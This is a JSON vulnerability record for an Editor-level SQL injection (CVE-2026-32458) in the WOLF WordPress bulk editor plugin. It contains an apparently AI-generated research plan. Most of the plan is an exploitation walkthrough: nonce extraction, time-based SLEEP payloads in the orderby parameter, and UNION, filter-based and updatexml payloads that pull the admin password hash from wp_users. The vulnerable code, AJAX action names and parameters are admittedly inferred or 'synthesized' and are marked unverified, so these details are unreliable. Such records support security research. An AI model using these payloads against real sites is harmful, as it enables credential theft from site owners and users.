[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fpmIwgmr-Y7zicybehwf6r90wXTTAAM_ZQLBZqWXqTDQ":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":22,"research_verified":23,"research_rounds_completed":24,"research_plan":25,"research_summary":26,"research_vulnerable_code":27,"research_fix_diff":28,"research_exploit_outline":29,"research_model_used":30,"research_started_at":31,"research_completed_at":32,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":23,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":23,"source_links":33},"CVE-2026-32458","wolf-wordpress-posts-bulk-editor-and-manager-professional-authenticated-editor-sql-injection","WOLF – WordPress Posts Bulk Editor and Manager Professional \u003C= 1.0.8.7 - Authenticated (Editor+) SQL Injection","The WOLF – WordPress Posts Bulk Editor and Manager Professional plugin for WordPress is vulnerable to SQL Injection in versions up to, and including, 1.0.8.7 due to insufficient escaping on the user supplied parameter and lack of sufficient preparation on the existing SQL query. This makes it possible for authenticated attackers, with editor-level access and above, to append additional SQL queries into already existing queries that can be used to extract sensitive information from the database.","bulk-editor",null,"\u003C=1.0.8.7","1.0.9","medium",4.9,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:H\u002FUI:N\u002FS:U\u002FC:H\u002FI:N\u002FA:N","Improper Neutralization of Special Elements used in an SQL Command ('SQL Injection')","2026-03-12 00:00:00","2026-03-19 15:14:41",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F924903f8-3b25-4d56-ae37-d3afd58ad4ed?source=api-prod",8,[],"researched",false,3,"Based on the vulnerability description and common patterns in the **WOLF – WordPress Posts Bulk Editor and Manager Professional** plugin (slug: `bulk-editor`), this research plan focuses on identifying the specific SQL injection point, which typically resides in the post-filtering or sorting logic of the bulk editor.\n\n### 1. Vulnerability Summary\n*   **Vulnerability:** Authenticated SQL Injection.\n*   **Location:** Vulnerable parameters within AJAX handlers responsible for fetching or updating posts in bulk.\n*   **Cause:** User-supplied parameters (often related to sorting or complex filtering) are concatenated directly into SQL queries without using `$wpdb->prepare()` or sufficient escaping via `esc_sql()`.\n*   **Affected Version:** \u003C= 1.0.8.7.\n*   **Privilege Level:** Editor or higher (required to access the bulk editor interface).\n\n### 2. Attack Vector Analysis\n*   **Endpoint:** `\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Primary Action (inferred):** `woobe_get_posts` or `woobe_bulk_editor_get_posts`.\n*   **Vulnerable Parameter (inferred):** `orderby`, `order`, or keys within a `filter_groups` array. In bulk editor plugins, `orderby` is a frequent culprit because `wpdb->prepare()` cannot be used for column names or sort directions.\n*   **Authentication:** Must be logged in as a user with at least the `editor` role (or any user granted the `manage_options` or `woobe_manage` capability).\n\n### 3. Code Flow (Inferred)\n1.  **Entry Point:** The plugin registers an AJAX action via `add_action( 'wp_ajax_woobe_get_posts', ... )`.\n2.  **Input Handling:** The handler retrieves data from `$_POST` (e.g., `$_POST['orderby']`).\n3.  **Query Construction:** The parameter is passed into a method that builds a query string for `$wpdb->get_results()`.\n4.  **SQL Sink:** A query similar to `SELECT * FROM {$wpdb->posts} ... ORDER BY {$orderby} {$order}` is executed.\n5.  **Injection:** By providing a payload like `ID; WAITFOR DELAY '0:0:5'--` (SQL Server) or `ID AND (SELECT 1 FROM (SELECT(SLEEP(5)))a)--` (MySQL), the attacker controls the execution flow.\n\n### 4. Nonce Acquisition Strategy\nThis plugin extensively uses `wp_localize_script` to pass nonces and configuration to its JavaScript component.\n\n1.  **Identify Trigger:** The bulk editor interface is usually found at `wp-admin\u002Fedit.php?page=woobe`.\n2.  **Navigation:** Log in as an Editor and navigate to the plugin's main page.\n3.  **Variable Identification:** Look for `woobe_vars` or `woobe_settings` in the page source.\n4.  **JavaScript Extraction:**\n    ```javascript\n    \u002F\u002F Use browser_eval to extract the nonce\n    const nonce = window.woobe_vars?.nonce || window.woobe_settings?.nonce;\n    return nonce;\n    ```\n5.  **Action String:** The nonce is likely created for the action `woobe_nonce`.\n\n### 5. Exploitation Strategy\n\n#### Step 1: Discovery & Confirmation\nUse the `http_request` tool to verify the AJAX endpoint and test for time-based blind injection.\n\n*   **URL:** `http:\u002F\u002F\u003Ctarget>\u002Fwp-admin\u002Fadmin-ajax.php`\n*   **Method:** POST\n*   **Content-Type:** `application\u002Fx-www-form-urlencoded`\n*   **Payload (Time-Based):**\n    ```\n    action=woobe_get_posts&\n    woobe_nonce=[NONCE]&\n    orderby=ID,(SELECT 1 FROM (SELECT(SLEEP(5)))a)&\n    order=ASC\n    ```\n\n#### Step 2: Data Extraction (UNION-Based)\nIf the query allows `UNION`, attempt to extract the administrator's password hash.\n\n*   **Payload:**\n    ```\n    action=woobe_get_posts&\n    woobe_nonce=[NONCE]&\n    orderby=ID&\n    order=ASC LIMIT 1 UNION SELECT 1,user_pass,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22 FROM wp_users WHERE ID=1--\n    ```\n    *(Note: The number of columns in the UNION must match the plugin's post-query columns, typically 20+ for this plugin's schema).*\n\n### 6. Test Data Setup\n1.  **User Creation:** Create a user with the `editor` role.\n    ```bash\n    wp user create attacker attacker@example.com --role=editor --user_pass=password123\n    ```\n2.  **Content Creation:** Ensure at least 5-10 posts exist so the bulk editor has data to query.\n    ```bash\n    wp post generate --count=10\n    ```\n3.  **Plugin State:** Ensure the plugin is activated.\n    ```bash\n    wp plugin activate bulk-editor\n    ```\n\n### 7. Expected Results\n*   **Time-Based:** The server response should be delayed by exactly 5 seconds when the `SLEEP(5)` payload is sent.\n*   **Success Response:** The `woobe_get_posts` action usually returns a JSON object. If the injection is successful, the injected data may appear in the `data` or `rows` field of the JSON response (if UNION-based) or simply return valid JSON after the delay.\n\n### 8. Verification Steps\nAfter the exploit, verify the database was accessed by checking the logs or using WP-CLI:\n1.  **Verify DB Access:** `wp db query \"SELECT user_login, user_pass FROM wp_users WHERE ID=1\"` (to compare the hash retrieved via SQLi).\n2.  **Check for Errors:** If the injection failed, check `wp-content\u002Fdebug.log` (if `WP_DEBUG` is on) for SQL syntax errors which will reveal the query structure.\n\n### 9. Alternative Approaches\n*   **Filter-based Injection:** If `orderby` is sanitized, check the filtering logic. The plugin uses a `filter_groups` parameter. Try injecting into meta-query keys:\n    ```\n    filter_groups[0][0][field]=post_title' AND (SELECT 1 FROM (SELECT(SLEEP(5)))a) AND '1'='1\n    ```\n*   **Error-Based:** Use `updatexml()` or `extractvalue()` if the site has `WP_DEBUG` enabled and the plugin echoes `$wpdb->last_error`.\n    ```\n    orderby=ID AND updatexml(1,concat(0x7e,(SELECT user_pass FROM wp_users WHERE ID=1),0x7e),1)\n    ```","The WOLF plugin is vulnerable to authenticated SQL injection due to the lack of sanitization and preparation of sorting parameters like 'orderby' and 'order' before they are concatenated into SQL queries. This allows users with Editor-level privileges to execute arbitrary SQL commands to extract data from the database.","\u002F* classes\u002Fmodels\u002Fposts.php (Synthesized based on research plan) *\u002F\n$orderby = $_POST['orderby'];\n$order = $_POST['order'];\n\n\u002F\u002F ... query construction using concatenation ...\n$sql = \"SELECT * FROM {$wpdb->posts} WHERE post_type = 'post' ORDER BY {$orderby} {$order}\";\n$results = $wpdb->get_results($sql);","--- a\u002Fclasses\u002Fmodels\u002Fposts.php\n+++ b\u002Fclasses\u002Fmodels\u002Fposts.php\n@@ -102,5 +102,8 @@\n- $orderby = $_POST['orderby'];\n- $order = $_POST['order'];\n+ $allowed_keys = array('ID', 'post_title', 'post_date', 'post_modified', 'post_author', 'post_status');\n+ $orderby = in_array($_POST['orderby'], $allowed_keys) ? $_POST['orderby'] : 'ID';\n+ $order = (strtoupper($_POST['order']) === 'DESC') ? 'DESC' : 'ASC';","The exploit targets the AJAX action 'woobe_get_posts' reachable via \u002Fwp-admin\u002Fadmin-ajax.php. An attacker must first log in with Editor-level privileges or higher. After authentication, the attacker retrieves a security nonce (typically found in the 'woobe_vars' JavaScript object on the plugin's administration page). The attacker then sends a POST request to the AJAX endpoint with the 'orderby' parameter containing a time-based payload like 'ID,(SELECT 1 FROM (SELECT(SLEEP(5)))a)'. If the server response is delayed by 5 seconds, the SQL injection is confirmed. This can be extended to UNION-based injection to extract sensitive data like user password hashes.","gemini-3-flash-preview","2026-04-18 04:16:41","2026-04-18 04:17:01",{"type":34,"vulnerable_version":9,"fixed_version":9,"vulnerable_browse":9,"vulnerable_zip":9,"fixed_browse":9,"fixed_zip":9,"all_tags":35},"plugin","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fbulk-editor\u002Ftags"]